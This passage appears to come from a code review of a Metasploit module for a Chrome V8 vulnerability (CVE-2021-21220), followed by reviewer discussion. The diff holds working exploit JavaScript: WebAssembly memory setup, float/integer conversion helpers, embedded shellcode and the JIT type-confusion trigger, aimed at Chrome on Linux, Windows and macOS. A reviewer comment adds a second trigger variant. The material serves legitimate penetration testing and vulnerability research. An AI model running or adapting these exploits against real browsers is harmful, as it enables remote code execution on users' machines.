modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb

```diff
@@ -0,0 +1,179 @@
+        'Author' => [
+          'Bruno Keith (bkth_)', # Vulnerability Discovery
+          'Niklas Baumstark (_niklasb)', # Vulnerabilty Discovery
+          'Rajvardhan Agarwal (r4j0x00)', # exploit
+          'Grant Willcox (tekwizz123)' # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2021-21220'],
+          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/chrome-0day'],
+          ['URL', 'https://twitter.com/r4j0x00/status/1382125720344793090'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1196683'], # Restricted at the time of writing, but should be public at some point.
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-21-411/']
+        ],
+        'Arch' => [ ARCH_X64 ],
+        'DefaultTarget' => 0,
+        'Payload' =>
+        {
+          'Space' => 4096
+        },
+        'Notes' =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Targets' =>
+          [
+            ['Linux - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'linux' }],
+            ['Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'win' }],
+            ['macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'osx' }],
+          ],
+        'DisclosureDate' => '2021-04-13'
+      )
+    )
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '')
+    jscript = <<~JS
+      var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+      var wasm_mod = new WebAssembly.Module(wasm_code);
+      var wasm_instance = new WebAssembly.Instance(wasm_mod);
+      var f = wasm_instance.exports.main;
+
+      var buf = new ArrayBuffer(8);
+      var f64_buf = new Float64Array(buf);
+      var u64_buf = new Uint32Array(buf);
+
+      var shellcode = new Uint8Array([#{shellcode}]);
+      var shellbuf = new ArrayBuffer(shellcode.length);
+      var dataview = new DataView(shellbuf);
+
+      function ftoi(val) {
+          f64_buf[0] = val;
+          return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+      }
+
+      function itof(val) {
+          u64_buf[0] = Number(val & 0xffffffffn);
+          u64_buf[1] = Number(val >> 32n);
+          return f64_buf[0];
+      }
+
+      const _arr = new Uint32Array([2**31]);
+
+      function foo(a) {
+          var x = 1;
+        x = (_arr[0] ^ 0) + 1;
+
+        x = Math.abs(x);
+        x -= 2147483647;
+        x = Math.max(x, 0);
+
+        x -= 1;
+        if(x==-1) x = 0;
```

Comment:
Nice work.
I think another exploitable bug that works in a similar same way (e.g produces a corrupted array) is simply:
```
      function foo(a) {
        let x = -1;
        if (!a) {
          x = 0xFFFFFFFF;
        }
        x = Math.max(0, x, -1);
        let z = 0 - x;
        var arr = new Array(z);
        arr.shift();
        var cor = [1.1, 1.2, 1.3];
...
```
I suspect this entire technique was killed in Chrome 90 though? 
@niklasb @bkth @r4j0x00

Reply:
yes, it will die once https://github.com/v8/v8/commit/d4aafa4022b718596b3deadcc3cdcb9209896154 hits stable